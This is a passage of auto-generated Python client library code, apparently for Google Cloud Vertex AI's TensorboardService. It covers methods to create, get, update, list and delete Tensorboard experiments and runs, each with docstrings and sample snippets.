A TensorboardExperiment is a group of
TensorboardRuns, that are typically the
results of a training job run, in a
Tensorboard.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([tensorboard_experiment, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.UpdateTensorboardExperimentRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, tensorboard_service.UpdateTensorboardExperimentRequest
):
request = tensorboard_service.UpdateTensorboardExperimentRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if tensorboard_experiment is not None:
request.tensorboard_experiment = tensorboard_experiment
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.update_tensorboard_experiment
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("tensorboard_experiment.name", request.tensorboard_experiment.name),)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def list_tensorboard_experiments(
self,
request: Optional[
Union[tensorboard_service.ListTensorboardExperimentsRequest, dict]
] = None,
*,
parent: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListTensorboardExperimentsPager:
r"""Lists TensorboardExperiments in a Location.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_list_tensorboard_experiments():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.ListTensorboardExperimentsRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_tensorboard_experiments(request=request)
# Handle the response
for response in page_result:
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.ListTensorboardExperimentsRequest, dict]):
The request object. Request message for
[TensorboardService.ListTensorboardExperiments][google.cloud.aiplatform.v1.TensorboardService.ListTensorboardExperiments].
parent (str):
Required. The resource name of the Tensorboard to list
TensorboardExperiments. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.services.tensorboard_service.pagers.ListTensorboardExperimentsPager:
Response message for
[TensorboardService.ListTensorboardExperiments][google.cloud.aiplatform.v1.TensorboardService.ListTensorboardExperiments].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.ListTensorboardExperimentsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, tensorboard_service.ListTensorboardExperimentsRequest
):
request = tensorboard_service.ListTensorboardExperimentsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.list_tensorboard_experiments
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListTensorboardExperimentsPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
def delete_tensorboard_experiment(
self,
request: Optional[
Union[tensorboard_service.DeleteTensorboardExperimentRequest, dict]
] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> gac_operation.Operation:
r"""Deletes a TensorboardExperiment.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_delete_tensorboard_experiment():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.DeleteTensorboardExperimentRequest(
name="name_value",
)
# Make the request
operation = client.delete_tensorboard_experiment(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.DeleteTensorboardExperimentRequest, dict]):
The request object. Request message for
[TensorboardService.DeleteTensorboardExperiment][google.cloud.aiplatform.v1.TensorboardService.DeleteTensorboardExperiment].
name (str):
Required. The name of the TensorboardExperiment to be
deleted. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to
use it as the request or the response type of an API
method. For instance:
service Foo {
rpc Bar(google.protobuf.Empty) returns
(google.protobuf.Empty);
}
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.DeleteTensorboardExperimentRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, tensorboard_service.DeleteTensorboardExperimentRequest
):
request = tensorboard_service.DeleteTensorboardExperimentRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.delete_tensorboard_experiment
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = gac_operation.from_gapic(
response,
self._transport.operations_client,
empty_pb2.Empty,
metadata_type=gca_operation.DeleteOperationMetadata,
)
# Done; return the response.
return response
def create_tensorboard_run(
self,
request: Optional[
Union[tensorboard_service.CreateTensorboardRunRequest, dict]
] = None,
*,
parent: Optional[str] = None,
tensorboard_run: Optional[gca_tensorboard_run.TensorboardRun] = None,
tensorboard_run_id: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> gca_tensorboard_run.TensorboardRun:
r"""Creates a TensorboardRun.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_create_tensorboard_run():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
tensorboard_run = aiplatform_v1.TensorboardRun()
tensorboard_run.display_name = "display_name_value"
request = aiplatform_v1.CreateTensorboardRunRequest(
parent="parent_value",
tensorboard_run=tensorboard_run,
tensorboard_run_id="tensorboard_run_id_value",
)
# Make the request
response = client.create_tensorboard_run(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.CreateTensorboardRunRequest, dict]):
The request object. Request message for
[TensorboardService.CreateTensorboardRun][google.cloud.aiplatform.v1.TensorboardService.CreateTensorboardRun].
parent (str):
Required. The resource name of the TensorboardExperiment
to create the TensorboardRun in. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
tensorboard_run (google.cloud.aiplatform_v1.types.TensorboardRun):
Required. The TensorboardRun to
create.
This corresponds to the ``tensorboard_run`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
tensorboard_run_id (str):
Required. The ID to use for the Tensorboard run, which
becomes the final component of the Tensorboard run's
resource name.
This value should be 1-128 characters, and valid
characters are /[a-z][0-9]-/.
This corresponds to the ``tensorboard_run_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.TensorboardRun:
TensorboardRun maps to a specific
execution of a training job with a given
set of hyperparameter values, model
definition, dataset, etc
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, tensorboard_run, tensorboard_run_id])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.CreateTensorboardRunRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.CreateTensorboardRunRequest):
request = tensorboard_service.CreateTensorboardRunRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if tensorboard_run is not None:
request.tensorboard_run = tensorboard_run
if tensorboard_run_id is not None:
request.tensorboard_run_id = tensorboard_run_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.create_tensorboard_run]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def batch_create_tensorboard_runs(
self,
request: Optional[
Union[tensorboard_service.BatchCreateTensorboardRunsRequest, dict]
] = None,
*,
parent: Optional[str] = None,
requests: Optional[
MutableSequence[tensorboard_service.CreateTensorboardRunRequest]
] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> tensorboard_service.BatchCreateTensorboardRunsResponse:
r"""Batch create TensorboardRuns.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_batch_create_tensorboard_runs():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
requests = aiplatform_v1.CreateTensorboardRunRequest()
requests.parent = "parent_value"
requests.tensorboard_run.display_name = "display_name_value"
requests.tensorboard_run_id = "tensorboard_run_id_value"
request = aiplatform_v1.BatchCreateTensorboardRunsRequest(
parent="parent_value",
requests=requests,
)
# Make the request
response = client.batch_create_tensorboard_runs(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.BatchCreateTensorboardRunsRequest, dict]):
The request object. Request message for
[TensorboardService.BatchCreateTensorboardRuns][google.cloud.aiplatform.v1.TensorboardService.BatchCreateTensorboardRuns].
parent (str):
Required. The resource name of the TensorboardExperiment
to create the TensorboardRuns in. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}``
The parent field in the CreateTensorboardRunRequest
messages must match this field.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
requests (MutableSequence[google.cloud.aiplatform_v1.types.CreateTensorboardRunRequest]):
Required. The request message
specifying the TensorboardRuns to
create. A maximum of 1000
TensorboardRuns can be created in a
batch.
This corresponds to the ``requests`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.BatchCreateTensorboardRunsResponse:
Response message for
[TensorboardService.BatchCreateTensorboardRuns][google.cloud.aiplatform.v1.TensorboardService.BatchCreateTensorboardRuns].
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, requests])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.BatchCreateTensorboardRunsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, tensorboard_service.BatchCreateTensorboardRunsRequest
):
request = tensorboard_service.BatchCreateTensorboardRunsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if requests is not None:
request.requests = requests
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.batch_create_tensorboard_runs
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def get_tensorboard_run(
self,
request: Optional[
Union[tensorboard_service.GetTensorboardRunRequest, dict]
] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> tensorboard_run.TensorboardRun:
r"""Gets a TensorboardRun.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_get_tensorboard_run():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.GetTensorboardRunRequest(
name="name_value",
)
# Make the request
response = client.get_tensorboard_run(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.GetTensorboardRunRequest, dict]):
The request object. Request message for
[TensorboardService.GetTensorboardRun][google.cloud.aiplatform.v1.TensorboardService.GetTensorboardRun].
name (str):
Required. The name of the TensorboardRun resource.
Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}/runs/{run}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.TensorboardRun:
TensorboardRun maps to a specific
execution of a training job with a given
set of hyperparameter values, model
definition, dataset, etc
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.GetTensorboardRunRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.GetTensorboardRunRequest):
request = tensorboard_service.GetTensorboardRunRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_tensorboard_run]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def update_tensorboard_run(
self,
request: Optional[
Union[tensorboard_service.UpdateTensorboardRunRequest, dict]
] = None,
*,
tensorboard_run: Optional[gca_tensorboard_run.TensorboardRun] = None,
update_mask: Optional[field_mask_pb2.FieldMask] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> gca_tensorboard_run.TensorboardRun:
r"""Updates a TensorboardRun.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_update_tensorboard_run():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
tensorboard_run = aiplatform_v1.TensorboardRun()
tensorboard_run.display_name = "display_name_value"
request = aiplatform_v1.UpdateTensorboardRunRequest(
tensorboard_run=tensorboard_run,
)
# Make the request
response = client.update_tensorboard_run(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.UpdateTensorboardRunRequest, dict]):
The request object. Request message for
[TensorboardService.UpdateTensorboardRun][google.cloud.aiplatform.v1.TensorboardService.UpdateTensorboardRun].
tensorboard_run (google.cloud.aiplatform_v1.types.TensorboardRun):
Required. The TensorboardRun's ``name`` field is used to
identify the TensorboardRun to be updated. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}/runs/{run}``
This corresponds to the ``tensorboard_run`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
Required. Field mask is used to specify the fields to be
overwritten in the TensorboardRun resource by the
update. The fields specified in the update_mask are
relative to the resource, not the full request. A field
is overwritten if it's in the mask. If the user does not
provide a mask then all fields are overwritten if new
values are specified.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.TensorboardRun:
TensorboardRun maps to a specific
execution of a training job with a given
set of hyperparameter values, model
definition, dataset, etc
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([tensorboard_run, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.UpdateTensorboardRunRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.UpdateTensorboardRunRequest):
request = tensorboard_service.UpdateTensorboardRunRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if tensorboard_run is not None:
request.tensorboard_run = tensorboard_run
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.update_tensorboard_run]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("tensorboard_run.name", request.tensorboard_run.name),)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def list_tensorboard_runs(
self,
request: Optional[
Union[tensorboard_service.ListTensorboardRunsRequest, dict]
] = None,
*,
parent: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListTensorboardRunsPager:
r"""Lists TensorboardRuns in a Location.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_list_tensorboard_runs():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.ListTensorboardRunsRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_tensorboard_runs(request=request)
# Handle the response
for response in page_result:
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.ListTensorboardRunsRequest, dict]):
The request object. Request message for
[TensorboardService.ListTensorboardRuns][google.cloud.aiplatform.v1.TensorboardService.ListTensorboardRuns].
parent (str):
Required. The resource name of the TensorboardExperiment
to list TensorboardRuns. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.services.tensorboard_service.pagers.ListTensorboardRunsPager:
Response message for
[TensorboardService.ListTensorboardRuns][google.cloud.aiplatform.v1.TensorboardService.ListTensorboardRuns].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.ListTensorboardRunsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.ListTensorboardRunsRequest):
request = tensorboard_service.ListTensorboardRunsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.list_tensorboard_runs]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListTensorboardRunsPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
def delete_tensorboard_run(
self,
request: Optional[
Union[tensorboard_service.DeleteTensorboardRunRequest, dict]
] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> gac_operation.Operation:
r"""Deletes a TensorboardRun.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_delete_tensorboard_run():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.DeleteTensorboardRunRequest(
name="name_value",
)
# Make the request
operation = client.delete_tensorboard_run(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.DeleteTensorboardRunRequest, dict]):
The request object. Request message for
[TensorboardService.DeleteTensorboardRun][google.cloud.aiplatform.v1.TensorboardService.DeleteTensorboardRun].
name (str):
Required. The name of the TensorboardRun to be deleted.
Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}/runs/{run}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to
use it as the request or the response type of an API
method. For instance:
service Foo {
rpc Bar(google.protobuf.Empty) returns
(google.protobuf.Empty);
}
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.DeleteTensorboardRunRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.DeleteTensorboardRunRequest):
request = tensorboard_service.DeleteTensorboardRunRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.delete_tensorboard_run]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = gac_operation.from_gapic(
response,
self._transport.operations_client,
empty_pb2.Empty,
metadata_type=gca_operation.DeleteOperationMetadata,
)
# Done; return the response.
return response
def batch_create_tensorboard_time_series(
self,
request: Optional[
Union[tensorboard_service.BatchCreateTensorboardTimeSeriesRequest, dict]
] = None,
*,
parent: Optional[str] = None,
requests: Optional[
MutableSequence[tensorboard_service.CreateTensorboardTimeSeriesRequest]
] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> tensorboard_service.BatchCreateTensorboardTimeSeriesResponse:
r"""Batch create TensorboardTimeSeries that belong to a
TensorboardExperiment.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_batch_create_tensorboard_time_series():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
requests = aiplatform_v1.CreateTensorboardTimeSeriesRequest()
requests.parent = "parent_value"
requests.tensorboard_time_series.display_name = "display_name_value"
requests.tensorboard_time_series.value_type = "BLOB_SEQUENCE"
request = aiplatform_v1.BatchCreateTensorboardTimeSeriesRequest(
parent="parent_value",
requests=requests,
)
# Make the request
response = client.batch_create_tensorboard_time_series(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.BatchCreateTensorboardTimeSeriesRequest, dict]):
The request object. Request message for
[TensorboardService.BatchCreateTensorboardTimeSeries][google.cloud.aiplatform.v1.TensorboardService.BatchCreateTensorboardTimeSeries].
parent (str):
Required. The resource name of the TensorboardExperiment
to create the TensorboardTimeSeries in. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}``
The TensorboardRuns referenced by the parent fields in
the CreateTensorboardTimeSeriesRequest messages must be
sub resources of this TensorboardExperiment.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
requests (MutableSequence[google.cloud.aiplatform_v1.types.CreateTensorboardTimeSeriesRequest]):
Required. The request message
specifying the TensorboardTimeSeries to
create. A maximum of 1000
TensorboardTimeSeries can be created in
a batch.
This corresponds to the ``requests`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.BatchCreateTensorboardTimeSeriesResponse:
Response message for
[TensorboardService.BatchCreateTensorboardTimeSeries][google.cloud.aiplatform.v1.TensorboardService.BatchCreateTensorboardTimeSeries].
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, requests])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.BatchCreateTensorboardTimeSeriesRequest.
